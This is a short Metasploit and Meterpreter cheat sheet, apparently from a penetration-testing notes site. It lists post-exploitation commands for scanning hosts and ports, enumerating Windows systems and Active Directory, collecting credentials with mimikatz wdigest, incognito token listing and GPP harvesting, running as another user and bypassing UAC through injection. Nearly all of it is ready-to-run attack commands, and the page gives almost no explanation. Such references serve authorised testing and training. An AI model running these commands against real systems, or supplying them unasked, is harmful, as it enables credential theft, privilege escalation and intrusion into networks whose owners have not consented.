Metasploit

Meterpreter

Arp Scan

run arp_scanner -r <iP>/24

Nmap

db_nmap -sS -A <IP>

PortScan

run auxiliary/scanner/portscan/tcp

Application Info

run post/windows/gather/enum_applications

Credential Gathering

run post/windows/gather/credentials/credential_collector
​
load mimikatz
wdigest
​
load incognito
list_tokens -u

Windows

# Collect a load of info
run winenum
​
# Show privs
run post/windows/gather/win_privs
​
# Run as
use exploit/windows/local/run_as
​
# Bypass UAC
use exploit/windows/local/bypassuac_injection
# Enumeration ADSI
load extapi
help extapi
​
adsi_computer_enum domainname
​
# GPP
use post/windows/gather/credentials/gpp
Copy link
On this page
Meterpreter
Arp Scan
Nmap
PortScan
Application Info
Credential Gathering
Windows
AD